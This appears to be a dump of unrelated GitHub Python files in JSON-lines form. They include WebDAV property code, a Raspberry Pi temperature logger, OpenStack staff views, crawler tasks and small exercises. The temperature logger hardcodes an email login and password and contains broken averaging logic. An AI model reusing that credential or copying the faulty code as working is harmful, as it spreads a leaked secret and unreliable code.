validate_repository=True):\n \"\"\"Formats the specified project repository.\n\n Formatting a project repository will simply remove any leading and trailing\n whitespace.\n\n Args:\n repository (str): A project repository to format.\n validate_repository (bool): If set to True, the specified project\n repository will be validated before it's processed.\n\n Returns:\n basestring: The formatted project repository.\n\n Raises:\n TypeError: If the repository argument is not a basestring instance, or\n validate_repository is not a boolean.\n ValueError: If the specified repository is not valid.\n \"\"\"\n check_arg_type(format_project_repository, \"repository\", repository, basestring)\n check_arg_type(format_project_repository, \"validate_repository\", validate_repository, bool)\n\n if validate_repository:\n valid, message = validator.is_project_repository(repository)\n if not valid:\n raise ValueError(message)\n\n return repository.strip()\n","repo_name":"othieno/geotagx-tool-formatter","sub_path":"src/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40252354320","text":"__docformat__ = 'restructuredtext'\n\nfrom xml.etree import ElementTree\n\nimport zope.component\nimport zope.interface\nfrom zope import schema\nfrom zope.schema.interfaces import IField\nfrom zope.schema.fieldproperty import FieldProperty\n\nfrom z3c.dav.interfaces import IDAVProperty, IDAVWidget, IDAVInputWidget\nfrom z3c.dav.interfaces import IOpaquePropertyStorage\nimport z3c.dav.widgets\nimport z3c.dav.utils\n\nclass DAVProperty(object):\n \"\"\"\n\n >>> from zope.interface.verify import verifyObject\n >>> from zope.schema import getFields\n >>> from zope.interface.interfaces import IInterface\n >>> from coreproperties import IDAVResourcetype\n >>> prop = DAVProperty('{DAV:}resourcetype', IDAVResourcetype)\n >>> verifyObject(IDAVProperty, prop)\n True\n >>> prop.namespace\n 'DAV:'\n >>> prop.__name__\n 'resourcetype'\n >>> verifyObject(IInterface, prop.iface)\n True\n >>> prop.field in getFields(prop.iface).values()\n True\n >>> verifyObject(IField, prop.field)\n True\n >>> prop.custom_widget is None\n True\n >>> prop.restricted\n False\n\n \"\"\"\n zope.interface.implements(IDAVProperty)\n\n namespace = FieldProperty(IDAVProperty['namespace'])\n __name__ = FieldProperty(IDAVProperty['__name__'])\n ## XXX - If a developer writes his own field and passes it into\n ## DAVProperty then it is next to impossible to get the to validate\n ## correctly.\n ## field = FieldProperty(IDAVProperty['field'])\n iface = FieldProperty(IDAVProperty['iface'])\n custom_widget = FieldProperty(IDAVProperty['custom_widget'])\n custom_input_widget = FieldProperty(IDAVProperty['custom_input_widget'])\n restricted = FieldProperty(IDAVProperty['restricted'])\n\n def __init__(self, tag, iface):\n namespace, name = z3c.dav.utils.parseEtreeTag(tag)\n self.namespace = namespace\n self.__name__ = name\n self.iface = iface\n self.field = iface[name]\n self.custom_widget = None\n self.custom_input_widget = None\n self.restricted = False\n\n\n_opaque_namespace_key = \"z3c.dav.properties.DAVOpaqueProperties\"\n\nclass DeadField(schema.Field):\n pass\n\n\nclass OpaqueWidget(z3c.dav.widgets.DAVWidget):\n\n def render(self):\n el = ElementTree.fromstring(self._value)\n return el\n\n\nclass OpaqueInputWidget(z3c.dav.widgets.DAVInputWidget):\n \"\"\"\n\n >>> class Storage(object):\n ... zope.interface.implements(IOpaquePropertyStorage)\n ... def __init__(self):\n ... self.data = {}\n ... def setProperty(self, tag, value):\n ... self.data[tag] = value\n ... def removeProperty(self, tag):\n ... del self.data[tag]\n ... def getProperty(self, tag):\n ... return self.data[tag]\n >>> storage = Storage()\n\n >>> from cStringIO import StringIO\n >>> from z3c.dav.publisher import WebDAVRequest\n >>> reqdata = '''\n ... \n ... \n ... 𐀀\n ... \n ... \n ... '''\n >>> request = WebDAVRequest(StringIO(reqdata),\n ... {'CONTENT_LENGTH': len(reqdata)})\n >>> request.processInputs()\n\n >>> prop = OpaqueProperty('{http://webdav.org/neon/litmus/}high-unicode')\n >>> widget = getWidget(prop, storage, request, type = IDAVInputWidget)\n\n >>> print widget.getInputValue() #doctest:+XMLDATA\n \\xf0\\x90\\x80\\x80\n\n \"\"\"\n\n def getInputValue(self):\n el = self.request.xmlDataSource.findall(\n \"{DAV:}set/{DAV:}prop/%s\" % self.context.tag)\n\n # XXX - ascii seems a bit wrong here\n return ElementTree.tostring(el[-1], encoding = \"utf-8\")\n\n\nclass IOpaqueField(IField):\n\n tag = schema.BytesLine(\n title = u\"ElementTree tag\",\n description = u\"This is the key used by the opaque properties storage\",\n required = True)\n\n\nclass OpaqueField(schema.Field):\n \"\"\"\n\n >>> from zope.interface.verify import verifyObject\n >>> field = OpaqueField(__name__ = 'test',\n ... title = u'Test opaque field',\n ... tag = '{testns:}test')\n\n >>> IOpaqueField.providedBy(field)\n True\n >>> field.tag\n '{testns:}test'\n\n >>> from zope.interface.verify import verifyObject\n >>> field = OpaqueField(__name__ = 'test',\n ... title = u'Test opaque field',\n ... tag = 'test')\n >>> IOpaqueField.providedBy(field)\n True\n >>> field.tag\n 'test'\n\n \"\"\"\n zope.interface.implements(IOpaqueField)\n\n tag = FieldProperty(IOpaqueField[\"tag\"])\n\n def __init__(self, tag, **kw):\n super(OpaqueField, self).__init__(**kw)\n self.tag = tag\n\n def get(self, obj):\n return obj.getProperty(self.tag)\n\n def set(self, obj, value):\n obj.setProperty(self.tag, value)\n\n\nclass OpaqueProperty(object):\n \"\"\"\n\n >>> from zope.interface.verify import verifyObject\n >>> prop = OpaqueProperty('{examplens:}testprop')\n >>> verifyObject(IDAVProperty, prop)\n True\n >>> IOpaqueField.providedBy(prop.field)\n True\n >>> prop.namespace\n 'examplens:'\n\n The namespace part of a opaque property can be None.\n\n >>> prop = OpaqueProperty('testprop')\n >>> verifyObject(IDAVProperty, prop)\n True\n >>> IOpaqueField.providedBy(prop.field)\n True\n >>> prop.namespace is None\n True\n\n \"\"\"\n zope.interface.implements(IDAVProperty)\n\n def __init__(self, tag):\n namespace, name = z3c.dav.utils.parseEtreeTag(tag)\n self.__name__ = name\n self.namespace = namespace\n self.iface = IOpaquePropertyStorage\n self.field = OpaqueField(\n __name__ = name,\n tag = tag,\n title = u\"\",\n description = u\"\")\n self.custom_widget = OpaqueWidget\n self.custom_input_widget = OpaqueInputWidget\n self.restricted = False\n\n\ndef getAllProperties(context, request):\n for name, prop in zope.component.getUtilitiesFor(IDAVProperty):\n adapter = zope.component.queryMultiAdapter((context, request),\n prop.iface,\n default = None)\n if adapter is None:\n continue\n\n yield prop, adapter\n\n adapter = IOpaquePropertyStorage(context, None)\n if adapter is None:\n raise StopIteration\n\n for tag in adapter.getAllProperties():\n yield OpaqueProperty(tag), adapter\n\n\ndef hasProperty(context, request, tag):\n prop = zope.component.queryUtility(IDAVProperty, name = tag, default = None)\n if prop is None:\n adapter = IOpaquePropertyStorage(context, None)\n if adapter is not None and adapter.hasProperty(tag):\n return True\n return False\n\n adapter = zope.component.queryMultiAdapter((context, request), prop.iface,\n default = None)\n if adapter is None:\n return False\n\n return True\n\n\ndef getProperty(context, request, tag, exists = False):\n prop = zope.component.queryUtility(IDAVProperty, name = tag, default = None)\n if prop is None:\n adapter = IOpaquePropertyStorage(context, None)\n if adapter is None:\n ## XXX - should we use the zope.publisher.interfaces.NotFound\n ## exceptin here.\n raise z3c.dav.interfaces.PropertyNotFound(context, tag, tag)\n\n if exists and not adapter.hasProperty(tag):\n ## XXX - should we use the zope.publisher.interfaces.NotFound\n ## exceptin here.\n raise z3c.dav.interfaces.PropertyNotFound(context, tag, tag)\n\n return OpaqueProperty(tag), adapter\n\n adapter = zope.component.queryMultiAdapter((context, request), prop.iface,\n default = None)\n if adapter is None:\n ## XXX - should we use the zope.publisher.interfaces.NotFound\n ## exceptin here.\n raise z3c.dav.interfaces.PropertyNotFound(context, tag, tag)\n\n return prop, adapter\n\n\ndef getWidget(prop, adapter, request, type = IDAVWidget):\n \"\"\"prop.field describes the data we want to render.\n \"\"\"\n if type is IDAVWidget and prop.custom_widget is not None:\n widget = prop.custom_widget(prop.field, request)\n elif type is IDAVInputWidget and prop.custom_input_widget is not None:\n widget = prop.custom_input_widget(prop.field, request)\n else:\n widget = zope.component.getMultiAdapter((prop.field, request), type)\n\n if IDAVWidget.providedBy(widget):\n field = prop.field.bind(adapter)\n widget.setRenderedValue(field.get(adapter))\n\n widget.namespace = prop.namespace\n\n return widget\n","repo_name":"mkerrin/z3c.dav","sub_path":"src/z3c/dav/properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18243070176","text":"import subprocess\r\nimport sys\r\nimport os\r\nimport statistics as stat\r\nfrom random import randint\r\n\r\nif len(sys.argv[1:]) <= 0:\r\n print('test.py ')\r\n sys.exit(1)\r\n\r\ndef run(fp, type):\r\n return subprocess.run([sys.argv[1], fp, type], stdout=subprocess.PIPE)\r\n\r\n\r\ndef test():\r\n for fp in os.listdir('.'):\r\n if 'cmplx_numbers' in fp:\r\n cmul4 = []\r\n cmul3 = []\r\n for x in range(50):\r\n proc = run(fp, '4')\r\n cmul4.append(float(proc.stdout))\r\n proc = run(fp, '3')\r\n cmul3.append(float(proc.stdout))\r\n\r\n print(fp, 'cmul4', stat.mean(cmul4), stat.stdev(cmul4))\r\n print(fp, 'cmul3', stat.mean(cmul3), stat.stdev(cmul3))\r\n\r\n\r\ndef genNum(len):\r\n if len < 1:\r\n return ''\r\n elif len == 1:\r\n return str(randint(1, 9))\r\n\r\n return ''.join([str(randint(1, 9))] + [str(randint(0, 9)) for _ in range(len - 1)])\r\n\r\n\r\ndef genData(len, amt=50):\r\n fp = 'tmpfile.txt'\r\n with open(fp, 'w') as tmp:\r\n for amount in range(amt):\r\n num1 = genNum(len)\r\n num2 = genNum(len)\r\n txt = ''.join(['(', num1, ', ', num2, ')']) + \"\\n\"\r\n tmp.write(txt)\r\n return fp\r\n\r\n\r\nfor bitlen in [50]:#, 50, 60, 70, 80, 90, 100, 200]:\r\n cmul3 = []\r\n cmul4 = []\r\n\r\n print('Generating Data')\r\n for multiplies in range(1, 200):\r\n fp = genData(bitlen, multiplies)\r\n\r\n data = []\r\n for _ in range(3):\r\n data.append(float(run(fp, '3').stdout))\r\n\r\n cmul3.append((multiplies, sum(data)/len(data)))\r\n\r\n data = []\r\n for _ in range(3):\r\n data.append(float(run(fp, '4').stdout))\r\n\r\n cmul4.append((multiplies, sum(data)/len(data)))\r\n\r\n print('Graphing...')\r\n import matplotlib.pyplot as plt\r\n\r\n fig, ax = plt.subplots()\r\n\r\n x = [tup[0] for tup in cmul3]\r\n y = [tup[1] for tup in cmul3]\r\n plt.plot(x, y, label='cmul3')\r\n\r\n x = [tup[0] for tup in cmul4]\r\n y = [tup[1] for tup in cmul4]\r\n plt.plot(x, y, label='cmul4')\r\n\r\n ax.legend(loc='upper left')\r\n ax.set_title(\"3-Multiply vs. 4-Multiply (\"+str(bitlen)+\"bits)\")\r\n ax.set_xlabel(\"# of multiplies\")\r\n ax.set_ylabel(\"Time\")\r\n\r\n plt.show()","repo_name":"Sieabah/cmsc-441","sub_path":"proj1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18859448816","text":"'''\nCount sort. \nOutperforms the default sorting routine when the range of values is reasonably bounded.\n'''\n\ndef count_sort(a):\n mn, mx = float('inf'), -float('inf')\n for x in a:\n if x < mn: mn = x\n if x > mx: mx = x\n counter = [0 for _ in range(mx - mn + 1)]\n for x in a:\n counter[x - mn] += 1\n j = 0\n for i in range(mx - mn + 1):\n a[j:j+counter[i]] = [i + mn]*counter[i]\n j += counter[i]\n","repo_name":"DSC-ChitkaraUniv/HacktoberFest-2020","sub_path":"Coding/Python/Counting sort.py","file_name":"Counting sort.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"34656046103","text":"import os\nimport time\nimport Adafruit_DHT\nimport paho.mqtt.client as mqtt\nfrom datetime import datetime\nimport smtplib, ssl\n\nDHT_SENSOR = Adafruit_DHT.AM2302\nDHT_PIN = 4\ntemp_list = []\nhum_list = []\ntemp_average = 0\nhum_average = 0\nclient = mqtt.Client()\ncsv = None\nport = 587 # For SSL email server\nsmtp_server = \"smtp.gmail.com\"\nsender_email = \"gewaechshaustemperatur@gmail.com\" # Enter your address\nreceiver_email = \"gewaechshaustemperatur@gmail.com\" # Enter receiver address\npassword = \"raspberrypi\"\n\nmessage = \"\"\"\\\nSubject: Geweachshaustemperatur niedrig\n\nTemperatur zu niedrig, bitte ueberpruefen\"\"\"\n\n\n\ntry:\n csv = open('/home/pi/humidity.csv', 'a+')\n if os.stat('/home/pi/humdity.csv').st_size == 0:\n csv.write('Date,Time,Temperature,Humidity\\t\\n')\nexcept:\n pass\n\ndef main():\n# open_csv()\n# if open_csv() is not True:\n# print(\"-1\")\n# return -1\n client.on_connect = on_connect\n client.on_message = on_message\n client.connect(\"192.168.2.54\", 1883, 60)\n count = 0 # count to keep cooldown after sending warning email\n while True:\n temp, hum = get_temperature_humidity()\n if(valid_temperature(temp) and valid_humidity(hum)):\n temp_list.append(temp)\n temp_list.pop(0)\n hum_list.append(hum)\n hum_list.pop(0)\n cal_avg_hum()\n cal_avg_temp()\n save_values_in_csv(temp, hum)\n now = datetime.now()\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n data = \"temperature: {}, humidity: {}, date: {}\".format(temp, hum, dt_string)\n client.publish(\"data\", data, 1)\n\n if(len(temp_list) > 0 and sum(temp_list) / len(temp_list) <= 9.5 and count == 0):\n send_mail()\n count = 120\n\n if(count > 0):\n count = count - 1 \n\n\n time.sleep(10)\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(\"$SYS/#\")\n\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n print(msg.topic+\" \"+str(msg.payload))\n\ndef get_temperature_humidity():\n while True: \n humidity, temperature = Adafruit_DHT.read_retry(DHT_SENSOR, DHT_PIN)\n if humidity is not None and temperature is not None:\n return temperature, humidity\n\n# Berechnet Durchschnittstemperatur\ndef cal_avg_temp():\n if temp_list:\n help_average = 0\n for i in range(0, len(temp_list)):\n help_average = help_average + temp_list[i]\n temp_average = help_average / len(temp_list)\n\n# Berechnet Durchschnittsfeuchtigkeit\ndef cal_avg_hum():\n if hum_list:\n help_average = 0\n for i in range(0, (hum_list)):\n help_average = help_average + hum_list[i]\n hum_average = help_average / len(hum_list)\n\n# Checks if temperature is valid | abweichung von avg_temperature\ndef valid_temperature(temp):\n if len(temp_list) >= 15:\n if cal_avg_temp() >= (temp + 5) or cal_avg_temp <= (temp + 5):\n return True\n return False\n return True\n\n# Checks if humidity is valid | abweichung von avg_humidity\ndef valid_humidity(hum):\n if len(hum_list) >= 15:\n if cal_avg_hum() >= (hum + 5) or cal_avg_hum <= (hum + 5):\n return True\n return False\n return True\n\n# Speichert übergebene Werte in .csv Datei\ndef save_values_in_csv(temp, hum):\n csv.write('{0},{1},{2:0.1f}*C,{3:0.1f}%\\r\\n'.format(time.strftime('%m/%d/%y'), time.strftime('%H:%M'), temp, hum))\n\n# Öffnet .csv Datei -> True: Erfolg\ndef open_csv():\n try:\n csv = open('/home/pi/humidity.csv', 'a+')\n if os.stat('/home/pi/humidity.csv').st_size == 0:\n csv.write('Date,Time,Temperature,Humidity\\r\\n')\n return True\n except:\n return False\n\n\n# sends temperature warning email\ndef send_mail():\n context = ssl.create_default_context()\n with smtplib.SMTP(smtp_server, port) as server:\n server.ehlo() # Can be omitted\n server.starttls(context=context)\n server.ehlo() # Can be omitted\n server.login(sender_email, password)\n server.sendmail(sender_email, receiver_email, message)\n server.quit()\n\nmain()\n","repo_name":"peta999/Test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19520723447","text":"from datetime import timedelta\nfrom crawlers import *\nfrom celery import Celery\nfrom celery.task import periodic_task\n\nimport os\nos.environ.setdefault('FORKED_BY_MULTIPROCESSING', '1')\n\n\napp = Celery('tasks', backend='amqp',\n broker='amqp://guest@localhost//')\n\n\n@periodic_task(run_every=timedelta(seconds=15))\ndef a():\n\tprint(\"calling fuctions...\")\n\tprint(\"HDFILMSIZLE starting...\")\n\ttry:\n\t\th = HdFilmsIzle()\n\t\th.getNewFilms()\n\t\th.writeToTxt()\n\t\tprint(\"HDFILMSIZLE finished!\")\n\texcept Exception as e:\n\t\tprint(e)\n\tprint(\"EKRANLARDAN starting...\")\n\ttry:\n\t\te = Ekranlardan()\n\t\te.getNewFilms()\n\t\te.writeToTxt()\n\t\tprint(\"EKRANLARDAN finished...\")\n\texcept Exception as e:\n\t\tprint(e)\n\tprint(\"UltraHdFilm starting...\")\n\ttry:\n\t\th = UltraHdFilm()\n\t\th.getNewFilms()\n\t\th.writeToTxt()\n\t\tprint(\"UltraHdFilm finished!\")\n\texcept Exception as e:\n\t\tprint(e)\n\tprint(\"FullHdFilmSitesi starting...\")\n\ttry:\n\t\te = FullHdFilmSitesi()\n\t\te.getNewFilms()\n\t\te.writeToTxt()\n\t\tprint(\"FullHdFilmSitesi finished...\")\n\texcept Exception as e:\n\t\tprint(e)\n\tprint(\"FilmIzleFilmSitesi starting...\")\n\ttry:\n\t\th = FilmIzleFilmSitesi()\n\t\th.getNewFilms()\n\t\th.writeToTxt()\n\t\tprint(\"FilmIzleFilmSitesi finished...\")\n\texcept Exception as e:\n\t\tprint(e)\n\n","repo_name":"e1nurh/yenifilmler_in","sub_path":"crawlers/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71603180969","text":"n = int(input())\r\nlista = []\r\ntotal = 0\r\n\r\nfor i in range(n):\r\n lista.append(int(input()))\r\n\r\n# maisCaro maisBarato | sort(reverse=True)\r\nlista.sort()\r\nlista.reverse()\r\n\r\nfor i in range(len(lista)):\r\n if i % 3 == 2:\r\n continue # passa para o proximo elemento da lista\r\n total += lista[i]\r\n\r\nprint(total)","repo_name":"kaiquesouzasantos/estudos-python","sub_path":"NepsAcademy/tresPorDois.py","file_name":"tresPorDois.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31080879976","text":"import logging\n\nfrom django.db.models import Count, Q\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django_filters.rest_framework import FilterSet\nfrom django_filters.rest_framework import NumberFilter\nfrom django.utils.translation import ugettext_lazy as _\nfrom rest_framework import filters\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\n\nfrom fleio.activitylog.utils.decorators import log_staff_activity\nfrom fleio.core.permissions.permissions_cache import permissions_cache\nfrom fleio.core.drf import CustomPermissions, StaffOnly\nfrom fleio.core.exceptions import ForbiddenException, ObjectNotFound\nfrom fleio.core.features import staff_active_features\nfrom fleio.core.filters import CustomFilter\n\nfrom fleio.openstack.api.identity import IdentityAdminApi\nfrom fleio.openstack.models import Project\nfrom fleio.openstack.project import Project as OpenstackProject\nfrom fleio.openstack import tasks\nfrom fleio.openstack.settings import plugin_settings\nfrom fleio.openstack.settings import get_excluded_projects\n\nfrom keystoneauth1.exceptions.http import NotFound\n\nfrom fleiostaff.openstack.projects.serializers import StaffProjectSerializers\n\nLOG = logging.getLogger(__name__)\n\n\nclass ProjectFilters(FilterSet):\n services_count = NumberFilter(field_name='services_count')\n\n class Meta:\n model = Project\n fields = ['services_count']\n\n\n@log_staff_activity(\n category_name='openstack', object_name='project',\n additional_activities={\n 'delete_project': _('Staff user {username} ({user_id}) deleted project ({object_id}).'),\n }\n)\nclass StaffProjectViewSet(viewsets.ModelViewSet):\n serializer_class = StaffProjectSerializers\n serializer_map = {\n 'create': StaffProjectSerializers,\n 'update': StaffProjectSerializers\n }\n permission_classes = (CustomPermissions, StaffOnly,)\n filter_backends = (filters.OrderingFilter, DjangoFilterBackend, CustomFilter, filters.SearchFilter)\n filter_class = ProjectFilters\n ordering_fields = ('project_id', 'project_domain_id', 'disabled', 'is_domain', 'name', 'created_at', 'updated_at')\n search_fields = ('project_id', 'project_domain_id', 'fleio_disabled_reason', 'name', 'description')\n ordering = ['-created_at']\n\n @property\n def identity_admin_api(self):\n if hasattr(self, 'request'):\n return IdentityAdminApi(request_session=self.request.session)\n else:\n return IdentityAdminApi()\n\n def get_queryset(self):\n if self.action == 'list':\n services_count = Count('service')\n return Project.objects.exclude(\n Q(project_id__in=get_excluded_projects()) | Q(deleted=True)\n ).annotate(\n services_count=services_count\n ).all()\n else:\n return Project.objects.all()\n\n def list(self, request, *args, **kwargs):\n response = super().list(request=request, *args, **kwargs)\n response.data['permissions'] = permissions_cache.get_view_permissions(request.user, self.basename)\n return response\n\n def get_serializer_class(self):\n return self.serializer_map.get(self.action, self.serializer_class)\n\n def destroy(self, request, *args, **kwargs):\n return Response(status=501, data={'detail': _('Not implemented')})\n\n def perform_update(self, serializer):\n db_project = Project.objects.get(id=serializer.validated_data['id'])\n openstack_project = OpenstackProject.with_admin_session(db_project.project_id)\n try:\n openstack_project.update(\n name=serializer.validated_data['name'],\n description=serializer.validated_data['description'],\n enabled=not serializer.validated_data['disabled']\n )\n except NotFound as e:\n raise ObjectNotFound(detail=e)\n\n def perform_create(self, serializer):\n self.identity_admin_api.client.projects.create(\n name=serializer.validated_data['name'],\n description=serializer.validated_data['description'],\n domain=plugin_settings.PROJECT_DOMAIN_ID,\n enabled=not serializer.validated_data.get('disabled', False)\n )\n\n @action(detail=True, methods=['post'])\n def delete_project(self, request, pk):\n del pk # unused\n\n if staff_active_features.is_enabled('demo'):\n raise ForbiddenException(detail=_('Operation not allowed in demo mode'))\n\n delete_all_resources = request.data.get('delete_all_resources', False)\n instance = self.get_object()\n if delete_all_resources:\n tasks.delete_client_project_resources.delay(project_id=instance.project_id, mark_project_as_deleted=False)\n return Response(\n status=200,\n data={'details': _('Project delete scheduled')}\n )\n else:\n project = OpenstackProject.with_admin_session(instance.project_id)\n project.delete()\n return Response(\n status=200,\n data={'details': _('Project deleted')}\n )\n\n @action(detail=False, methods=['get'])\n def permissions(self, request):\n view_permissions = permissions_cache.get_view_permissions(request.user, self.basename)\n return Response(data=view_permissions)\n","repo_name":"pizzhub/backendfleio-test","sub_path":"project/fleiostaff/openstack/projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2773337589","text":"import unittest\nfrom mdict import *\nfrom hypothesis import given\nimport hypothesis.strategies as st\n\n\nclass TestImmutableList(unittest.TestCase):\n\n def test_add(self):\n dict = mydict()\n dict.add(\"1\", 2)\n dict.add(\"hh\", 'cat')\n dict.add(\"0ii\", 'dog')\n self.assertEqual(dict.to_list(), [[\"0ii\", 'dog'], [\"1\", 2], [\"hh\", 'cat']])\n\n def test_remove(self):\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 'cat')\n dict.add(0, 'dog')\n\n dict.remove(1)\n self.assertEqual(dict.to_list(), [[0, 'dog'], [2, 'cat']])\n\n def test_size(self):\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 'cat')\n dict.add(0, 'dog')\n self.assertEqual(dict.size(), 3)\n\n def test_find(self):\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 'cat')\n dict.add(0, 'dog')\n self.assertEqual(dict.find(2), 'cat')\n\n def test_iterator(self):\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 'cat')\n dict.add(0, 'dog')\n dicList = []\n for dic in dict:\n dicList.append(dic)\n self.assertEqual(dicList, [[0, 'dog'], [1, 2], [2, 'cat']])\n itrate1 = iter(dict)\n itrate2 = iter(dict)\n leng = len(dicList)\n while(leng):\n self.assertEqual(next(itrate1),next(itrate2))\n leng-=1\n\n def test_filter(self):\n def func(k):\n if k % 2 == 0:\n return True\n return False\n\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 2)\n dict.add(0, 2)\n list = dict.to_list()\n list2 = []\n for i in range(len(list)):\n if func(list[i][0]):\n list2.append(list[i])\n\n itor = dict.filter(func)\n test = []\n while itor.has_next():\n test.append(itor.__next__())\n self.assertEqual(test, list2)\n\n def test_map(self):\n def func(k):\n k + 1\n\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 2)\n dict.add(0, 2)\n list = dict.to_list()\n list2 = []\n for i in list:\n i[1] = func(i[1])\n list2.append(i)\n\n itor = dict.map(func)\n test = []\n while itor.has_next():\n test.append(itor.__next__())\n self.assertEqual(test, list2)\n\n def test_reduce(self):\n def func(k, j):\n return k + j\n\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 2)\n dict.add(0, 2)\n sum = dict.reduce(func)\n self.assertEqual(sum, 6)\n\n def test_dict(self):\n d = mydict()\n self.assertEqual(d.find(1), None)\n d.add(0, 1)\n self.assertEqual(d.find(0), 1)\n d.add(0, 'dog')\n self.assertEqual(d.find(0), 'dog')\n d.add(1, None)\n self.assertEqual(d.find(1), None)\n\n def test_from_List(self):\n list = [[2, 3], [0, 1], [1, 2]]\n dict = mydict()\n dict.from_list(list)\n self.assertEqual([dict.root.k, dict.root.v], [1, 2])\n self.assertEqual([dict.root.lc.k, dict.root.lc.v], [0, 1])\n self.assertEqual([dict.root.rc.k, dict.root.rc.v], [2, 3])\n\n def test_to_List(self):\n dict = mydict()\n dict.add(0, 2)\n dict.add(1, 3)\n dict.add(2, 4)\n self.assertEqual(dict.to_list(), [[0, 2], [1, 3], [2, 4]])\n\n def test_mconcat(self):\n dict1 = mydict()\n dict2 = mydict()\n dict1.add(4, 1)\n dict1.add(1, 2)\n dict1.add(2, 2)\n dict1.add(0, 2)\n dict2.add(-1, 1)\n dict2.add(-1, 2)\n dict2.add(3, 2)\n dict2.add(1, 3)\n dict3 = mydict.mconcat(dict1, dict2)\n self.assertEqual(dict3.to_list(), [[-1, 2], [0, 2], [1, 2], [2, 2], [3, 2], [4, 1]])\n dict3 = mydict.mconcat(dict2, dict1)\n self.assertEqual(dict3.to_list(), [[-1, 2], [0, 2], [1, 2], [2, 2], [3, 2], [4, 1]])\n\n @given(st.lists(st.lists(st.integers(), min_size=2, max_size=4)))\n def test_from_list_to_list_equality(self, a):\n # The generated test data is processed\n dict = mydict()\n d = {}\n for i in a:\n d[i[0]] = i[1]\n key_value = list(d.keys())\n leng = len(key_value)\n for i in range(leng, 0, -1):\n for j in range(1, i):\n if (str(key_value[j]) < str(key_value[j - 1])):\n tem = key_value[j]\n key_value[j] = key_value[j - 1]\n key_value[j - 1] = tem\n\n value_list = list(d.values())\n c = []\n for i in range(len(key_value)):\n c.append([key_value[i], value_list[i]])\n dict.from_list(c)\n b = dict.to_list()\n self.assertEqual(b, c)\n\n @given(st.lists(st.lists(st.integers(), min_size=2, max_size=4)))\n def test_monoid_identity(self, a):\n # The generated test data is processed\n dict1 = mydict()\n dict2 = mydict()\n d = {}\n for i in a:\n d[i[0]] = i[1]\n key_value = list(d.keys())\n leng = len(key_value)\n for i in range(leng, 0, -1):\n for j in range(1, i):\n if (str(key_value[j]) < str(key_value[j - 1])):\n tem = key_value[j]\n key_value[j] = key_value[j - 1]\n key_value[j - 1] = tem\n value_list = list(d.values())\n c = []\n for i in range(len(key_value)):\n c.append([key_value[i], value_list[i]])\n dict2.from_list(c)\n dict2 = mydict.mconcat(dict1.mempty(), dict2)\n self.assertEqual(dict2.to_list(), c)\n\n dict1.from_list(c)\n dict1 = mydict.mconcat(dict1, dict2.mempty())\n self.assertEqual(dict1.to_list(), c)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"paopaowu/LAW-lab-1-variant6","sub_path":"src/mdict_test.py","file_name":"mdict_test.py","file_ext":"py","file_size_in_byte":5816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16050435144","text":"import os\n\nspecial_char = u'\\ufeff'\ndst_folder = os.getcwd()\nfilenames = [f for f in os.listdir(dst_folder) if os.path.isfile(f)]\nprint(filenames)\n\nfor filename in filenames:\n print(filename)\n f1 = open(file=filename, mode='r')\n f_content = f1.read()\n flag = f_content.find(special_char)\n f1.close()\n print(flag)\n\n if (flag != -1):\n f2 = open(file=filename, mode='w')\n f2.write(f_content.replace(special_char, ''))\n f2.close()","repo_name":"shopgauluoi/shopgauluoi.github.io","sub_path":"products/fix_encoding.py","file_name":"fix_encoding.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13884541231","text":"from __future__ import absolute_import\n\nfrom ctypes import Structure, c_short, c_ushort, c_int\n\n__all__=['DB2_TIMESTAMP']\n\nclass DB2_TIMESTAMP(Structure):\n '''\n SQLSMALLINT year;\n SQLUSMALLINT month;\n SQLUSMALLINT day\n SQLUSMALLINT hour;\n SQLUSMALLINT minute;\n SQLUSMALLINT second;\n SQLUINTEGER fraction;\n '''\n _pack_ = True\n _fields_ = [(\"year\", c_short),\n (\"month\", c_ushort),\n (\"day\", c_ushort),\n (\"hour\", c_ushort),\n (\"minute\", c_ushort),\n (\"second\", c_ushort),\n (\"fraction\", c_int),\n ]\n\n def __init__(self):\n self.year = 0\n self.month = 0\n self.day = 0\n self.hour = 0\n self.minute = 0\n self.second = 0\n self.fraction = 0\n\n def __str__(self):\n #my_str = \"\"\n #YYYY-MM-DD\n return 